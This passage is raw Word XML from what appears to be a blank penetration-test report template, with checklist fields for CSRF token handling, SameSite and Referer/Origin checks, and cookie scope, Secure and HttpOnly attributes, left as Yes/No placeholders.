              </w:rPr>
              <w:t>CSRF Token Implementation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08ABBE9" w14:textId="77777777" w:rsidR="00D4527F" w:rsidRDefault="00E92518" w:rsidP="00CA15B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E9251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Present? Yes/No, Unique per session? Yes/No, Predictable? Yes/No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E4BBEB6" w14:textId="77777777" w:rsidR="00E92518" w:rsidRDefault="00E92518" w:rsidP="00CA15B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0E34185" w14:textId="177F1C03" w:rsidR="00E92518" w:rsidRPr="00D4527F" w:rsidRDefault="00E92518" w:rsidP="00CA15B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E92518" w:rsidRPr="007E4EF4" w14:paraId="6547FCCA" w14:textId="77777777" w:rsidTr="00F74C2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3E2AFE3" w14:textId="53170EF1" w:rsidR="00E92518" w:rsidRPr="00E92518" w:rsidRDefault="00E92518" w:rsidP="00F74C2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92518">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Request Manipulation Test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010CD05" w14:textId="77777777" w:rsidR="00E92518" w:rsidRDefault="00E92518" w:rsidP="00CA15B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D234E8" w:rsidRPr="00D234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Token Removed/Modified – Was the request still accepted? Yes/No</w:t>
            </w:r>
            <w:r w:rsidR="00D234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2666FA6" w14:textId="77777777" w:rsidR="00D234E8" w:rsidRDefault="00D234E8" w:rsidP="00CA15B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A8256C8" w14:textId="37193870" w:rsidR="00D234E8" w:rsidRDefault="00D234E8" w:rsidP="00CA15B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234E8" w:rsidRPr="007E4EF4" w14:paraId="43BEFCDC" w14:textId="77777777" w:rsidTr="00F74C2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E4CC03B" w14:textId="43839A80" w:rsidR="00D234E8" w:rsidRPr="00E92518" w:rsidRDefault="00D234E8" w:rsidP="00F74C2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234E8">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>CSRF Vulnerability via GET Requests?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3DBCB9D" w14:textId="77777777" w:rsidR="00D234E8" w:rsidRDefault="00D234E8" w:rsidP="00CA15B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D234E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List of Affected Endpoints if applicable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49726C1" w14:textId="77777777" w:rsidR="00D234E8" w:rsidRDefault="00D234E8" w:rsidP="00CA15B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17795E9" w14:textId="1C484E3C" w:rsidR="00D234E8" w:rsidRDefault="00D234E8" w:rsidP="00CA15B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26AE0" w:rsidRPr="007E4EF4" w14:paraId="10FAFE9A" w14:textId="77777777" w:rsidTr="00F74C2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D4BCFF1" w14:textId="17349635" w:rsidR="00626AE0" w:rsidRPr="00D234E8" w:rsidRDefault="00626AE0" w:rsidP="00F74C2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26AE0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>CSRF Exploit via HTML/JavaScript Successful?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33E66C1" w14:textId="77777777" w:rsidR="00626AE0" w:rsidRDefault="00626AE0" w:rsidP="00CA15B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626AE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Details if applicable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0755998" w14:textId="4B649E3A" w:rsidR="00452DE6" w:rsidRDefault="00452DE6" w:rsidP="00CA15B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452DE6" w:rsidRPr="007E4EF4" w14:paraId="04DCEF95" w14:textId="77777777" w:rsidTr="00F74C2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3CA7ACF" w14:textId="086384EB" w:rsidR="00452DE6" w:rsidRPr="00626AE0" w:rsidRDefault="00452DE6" w:rsidP="00F74C2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52DE6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SameSite Cookie Attribute Properly Configured?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9A0C13B" w14:textId="77777777" w:rsidR="00452DE6" w:rsidRDefault="00452DE6" w:rsidP="00CA15B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452DE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Strict/Lax/None, Details if applicable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9D6147D" w14:textId="0777F1FD" w:rsidR="00452DE6" w:rsidRDefault="00452DE6" w:rsidP="00CA15B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452DE6" w:rsidRPr="007E4EF4" w14:paraId="19554D9F" w14:textId="77777777" w:rsidTr="00F74C2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C8E65F3" w14:textId="0C26E75F" w:rsidR="00452DE6" w:rsidRPr="00452DE6" w:rsidRDefault="00B22E90" w:rsidP="00F74C2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22E90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Referer/Origin Header Validation Implemented?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441AA26" w14:textId="77777777" w:rsidR="00452DE6" w:rsidRDefault="00B22E90" w:rsidP="00CA15B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B22E9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Details if applicable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C0A084B" w14:textId="77777777" w:rsidR="00B22E90" w:rsidRDefault="00B22E90" w:rsidP="00CA15B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2659841" w14:textId="77777777" w:rsidR="00B22E90" w:rsidRDefault="00B22E90" w:rsidP="00CA15B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41610B7" w14:textId="77777777" w:rsidR="00F74C2C" w:rsidRDefault="00F74C2C" w:rsidP="00CA15B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3BBF596" w14:textId="77777777" w:rsidR="00F74C2C" w:rsidRDefault="00F74C2C" w:rsidP="00CA15B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DEA1C86" w14:textId="5D1C08D2" w:rsidR="00F74C2C" w:rsidRDefault="00F74C2C" w:rsidP="00CA15B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7E4EF4" w:rsidRPr="007E4EF4" w14:paraId="2C85AC7E" w14:textId="77777777" w:rsidTr="00F74C2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9C6899F" w14:textId="632B8B53" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="00DE66BD" w:rsidP="00F74C2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="007E4EF4" w:rsidRPr="007E4EF4"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 XSRF Vulnerabilities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09A5CE0" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="90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CE9B51F" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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CD64580" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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334EDCF" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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093DB6A" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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3555AB4" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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E4EF4" w:rsidRPr="007E4EF4" w14:paraId="36266197" w14:textId="77777777" w:rsidTr="00F74C2C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F37366A" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="00F74C2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E4EF4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42F55C7" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="88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6FA81E5" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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355F66D" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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3DB6AF8" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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3A38ED9" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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4AC041B" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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69573B61" w14:textId="77777777" w:rsidR="00E408A5" w:rsidRPr="00A51A96" w:rsidRDefault="00E408A5" w:rsidP="00E408A5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08A5" w14:paraId="4F327647" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="528DD6B9" w14:textId="77777777" w:rsidR="00E408A5" w:rsidRDefault="00E408A5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="267352EC" w14:textId="77777777" w:rsidR="00E408A5" w:rsidRDefault="00E408A5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3140E7CD" w14:textId="77777777" w:rsidR="00E408A5" w:rsidRDefault="00E408A5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22096290" w14:textId="77777777" w:rsidR="00E408A5" w:rsidRDefault="00E408A5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="574A55B8" w14:textId="77777777" w:rsidR="00E408A5" w:rsidRDefault="00E408A5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0110672C" w14:textId="77777777" w:rsidR="00F74C2C" w:rsidRDefault="00F74C2C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B5685B6" w14:textId="77777777" w:rsidR="00F74C2C" w:rsidRDefault="00F74C2C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D8FCEEB" w14:textId="77777777" w:rsidR="00F74C2C" w:rsidRDefault="00F74C2C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4093E9CE" w14:textId="77777777" w:rsidR="00F74C2C" w:rsidRDefault="00F74C2C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3451B51A" w14:textId="77777777" w:rsidR="00F74C2C" w:rsidRDefault="00F74C2C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52A26C26" w14:textId="77777777" w:rsidR="00322EF7" w:rsidRDefault="00322EF7" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59C755C6" w14:textId="77777777" w:rsidR="00E408A5" w:rsidRDefault="00E408A5" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A6AE2EC" w14:textId="77777777" w:rsidR="007771DC" w:rsidRDefault="007771DC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095D81" w:rsidRPr="00A51A96" w14:paraId="739F3112" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2DB4293F" w14:textId="48BEE5F3" w:rsidR="00095D81" w:rsidRPr="003C713F" w:rsidRDefault="00095D81" w:rsidP="00725128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5.9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F025BF" w:rsidRPr="00F025BF">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check Cookie Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="207CE87B" w14:textId="77777777" w:rsidR="00E408A5" w:rsidRPr="003D4F44" w:rsidRDefault="00E408A5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451"/>
        <w:gridCol w:w="3555"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w14:paraId="1BEADE4D" w14:textId="77777777" w:rsidTr="003D4F4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30568B5" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="003D4F4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B4D8E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18EBCB9" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8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B4D8E" w:rsidRPr="009B4D8E" w14:paraId="25EDD4CF" w14:textId="77777777" w:rsidTr="003D4F4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C5EE254" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="003D4F4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B4D8E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F1D6663" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8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B4D8E" w:rsidRPr="009B4D8E" w14:paraId="39F5E2A8" w14:textId="77777777" w:rsidTr="003D4F4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009D1F5" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="003D4F4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B4D8E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3C865CC" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8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B4D8E" w:rsidRPr="009B4D8E" w14:paraId="78F6E697" w14:textId="77777777" w:rsidTr="003D4F44">
        <w:trPr>
          <w:trHeight w:val="1232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9050C91" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="003D4F4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B4D8E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Path and Domain Attributes of Set-Cookie Header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3270F40" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8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7117FA9" w14:textId="77777777" w:rsidR="003D4F44" w:rsidRDefault="003D4F44" w:rsidP="009B4D8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7422C16" w14:textId="77777777" w:rsidR="003D4F44" w:rsidRDefault="003D4F44" w:rsidP="009B4D8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74096D2" w14:textId="77777777" w:rsidR="003D4F44" w:rsidRDefault="003D4F44" w:rsidP="009B4D8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1BFDFBB" w14:textId="77777777" w:rsidR="003D4F44" w:rsidRPr="009B4D8E" w:rsidRDefault="003D4F44" w:rsidP="009B4D8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B4D8E" w:rsidRPr="009B4D8E" w14:paraId="43326E0E" w14:textId="77777777" w:rsidTr="003D4F4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2F93102" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="003D4F4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B4D8E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Does the App Explicitly Uses Cookie Scope to a Parent Domain or Parent Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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CD9E0D6" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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9B4D8E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Parent Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355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D9333AD" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E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9B4D8E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Parent Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w14:paraId="525E4D27" w14:textId="77777777" w:rsidTr="003D4F4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0B4F2D2" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="003D4F4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B4D8E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Domain Names and Paths that Receive the Cookies Issued by the App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8D40CB3" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="91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9F80186" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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A5F5674" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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684AC1C" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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ACB6D57" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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92E5ACE" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8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46371" w:rsidRPr="009B4D8E" w14:paraId="7B69A936" w14:textId="77777777" w:rsidTr="003D4F4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9450811" w14:textId="7F9BA09B" w:rsidR="00746371" w:rsidRPr="009B4D8E" w:rsidRDefault="00C35C09" w:rsidP="003D4F4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35C09">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Enumerated Cookies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21857F6" w14:textId="77777777" w:rsidR="00746371" w:rsidRPr="00C35C09" w:rsidRDefault="00C35C09" w:rsidP="0074637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C35C0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[*Session, Authentication, Sensitive Data Identified? Yes/No, List if found]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F354F2" w14:textId="77777777" w:rsidR="00C35C09" w:rsidRDefault="00C35C09" w:rsidP="0074637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85336CA" w14:textId="02470490" w:rsidR="00C35C09" w:rsidRPr="009B4D8E" w:rsidRDefault="00C35C09" w:rsidP="0074637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35C09" w:rsidRPr="009B4D8E" w14:paraId="1F7069A1" w14:textId="77777777" w:rsidTr="003D4F4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539963D" w14:textId="11A067EC" w:rsidR="00C35C09" w:rsidRPr="00C35C09" w:rsidRDefault="00494EAD" w:rsidP="003D4F4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94EAD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Domain Scope Analysis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506C5C0" w14:textId="77777777" w:rsidR="00C35C09" w:rsidRDefault="00494EAD" w:rsidP="0074637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494EA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Broad Domain Scope Detected? Yes/No, Subdomain Access Issues?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D376C3F" w14:textId="77777777" w:rsidR="00494EAD" w:rsidRDefault="00494EAD" w:rsidP="0074637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BFF92F9" w14:textId="77777777" w:rsidR="00494EAD" w:rsidRDefault="00494EAD" w:rsidP="0074637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D45879C" w14:textId="08890F35" w:rsidR="00494EAD" w:rsidRPr="00C35C09" w:rsidRDefault="00494EAD" w:rsidP="0074637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494EAD" w:rsidRPr="009B4D8E" w14:paraId="350EC15E" w14:textId="77777777" w:rsidTr="003D4F4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2B372BD" w14:textId="67133C13" w:rsidR="00494EAD" w:rsidRPr="00494EAD" w:rsidRDefault="00494EAD" w:rsidP="003D4F4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94EAD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Path Scope Analysis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22FCE8D" w14:textId="77777777" w:rsidR="00494EAD" w:rsidRDefault="00494EAD" w:rsidP="0074637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2811BB" w:rsidRPr="002811B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Cookies Accessible from Unintended Paths? Yes/No, Affected Paths if found</w:t>
            </w:r>
            <w:r w:rsidR="002811B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567EE92" w14:textId="77777777" w:rsidR="002811BB" w:rsidRDefault="002811BB" w:rsidP="0074637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BD4611A" w14:textId="77777777" w:rsidR="002811BB" w:rsidRDefault="002811BB" w:rsidP="0074637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9455D08" w14:textId="44311355" w:rsidR="002811BB" w:rsidRDefault="002811BB" w:rsidP="0074637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811BB" w:rsidRPr="009B4D8E" w14:paraId="3428BB68" w14:textId="77777777" w:rsidTr="003D4F4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B9CE6C2" w14:textId="56FF3060" w:rsidR="002811BB" w:rsidRPr="00494EAD" w:rsidRDefault="002811BB" w:rsidP="003D4F4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811BB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Secure Attribute Presence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8FBDD1B" w14:textId="77777777" w:rsidR="002811BB" w:rsidRDefault="002811BB" w:rsidP="0074637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D40DC8" w:rsidRPr="00D40DC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Cookies Transmitted Over HTTP? Yes/No, MITM Exploitable?</w:t>
            </w:r>
            <w:r w:rsidR="00D40DC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5950374" w14:textId="77777777" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="0074637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D4D93B7" w14:textId="386C4DA4" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="0074637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D5C00" w:rsidRPr="009B4D8E" w14:paraId="51617BB9" w14:textId="77777777" w:rsidTr="003D4F4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10F5A78" w14:textId="5C3DB036" w:rsidR="009D5C00" w:rsidRPr="002811BB" w:rsidRDefault="009D5C00" w:rsidP="003D4F4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D5C00">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HttpOnly Attribute Protection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D811594" w14:textId="77777777" w:rsidR="009D5C00" w:rsidRDefault="00566456" w:rsidP="0074637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56645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XSS Cookie Theft Possible? Yes/No, Evidence if applicable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084DD39" w14:textId="77777777" w:rsidR="00566456" w:rsidRDefault="00566456" w:rsidP="0074637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F0EDE7E" w14:textId="77777777" w:rsidR="00566456" w:rsidRDefault="00566456" w:rsidP="0074637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50E51B6" w14:textId="053C6493" w:rsidR="00566456" w:rsidRDefault="00566456" w:rsidP="0074637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8C5C05" w:rsidRPr="009B4D8E" w14:paraId="75B0C81E" w14:textId="77777777" w:rsidTr="003D4F4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A7F2710" w14:textId="4B10E1D1" w:rsidR="008C5C05" w:rsidRPr="009D5C00" w:rsidRDefault="002027F6" w:rsidP="003D4F4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027F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SameSite Attribute Assessment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97FB5AA" w14:textId="77777777" w:rsidR="008C5C05" w:rsidRDefault="002027F6" w:rsidP="0074637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2027F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Properly Configured? Yes/No, CSRF Exploit Possible? Yes/No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2FA0FBA" w14:textId="77777777" w:rsidR="002027F6" w:rsidRDefault="002027F6" w:rsidP="0074637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7735914" w14:textId="77777777" w:rsidR="002027F6" w:rsidRDefault="002027F6" w:rsidP="0074637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B0A5021" w14:textId="370396CE" w:rsidR="002027F6" w:rsidRDefault="002027F6" w:rsidP="0074637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B4D8E" w:rsidRPr="009B4D8E" w14:paraId="7CDDB57C" w14:textId="77777777" w:rsidTr="003D4F4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6C2B37A" w14:textId="2AEE3FBC" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="00566456" w:rsidP="003D4F4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="009B4D8E" w:rsidRPr="009B4D8E"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 Vulnerabilities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66C0EC8" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="93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A800917" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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CE989B5" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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65489C4" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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4361A11" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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A92CD60" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8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B4D8E" w:rsidRPr="009B4D8E" w14:paraId="1BAE11E3" w14:textId="77777777" w:rsidTr="003D4F4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0885F8A" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="003D4F4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B4D8E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AC616F5" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="92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C6BAF70" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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A362E08" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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B90DAA5" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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F20E1CE" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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B836B0A" w14:textId="77777777" w:rsidR="009B4D8E" w:rsidRPr="009B4D8E" w:rsidRDefault="009B4D8E" w:rsidP="009B4D8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18D7BEE2" w14:textId="77777777" w:rsidR="008C5C05" w:rsidRPr="00A51A96" w:rsidRDefault="008C5C05" w:rsidP="008C5C05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C5C05" w14:paraId="7A39790D" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27C2A0DF" w14:textId="77777777" w:rsidR="008C5C05" w:rsidRDefault="008C5C05" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70A24A66" w14:textId="77777777" w:rsidR="008C5C05" w:rsidRDefault="008C5C05" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D0D1E86" w14:textId="77777777" w:rsidR="008C5C05" w:rsidRDefault="008C5C05" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B58AAB6" w14:textId="77777777" w:rsidR="008C5C05" w:rsidRDefault="008C5C05" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
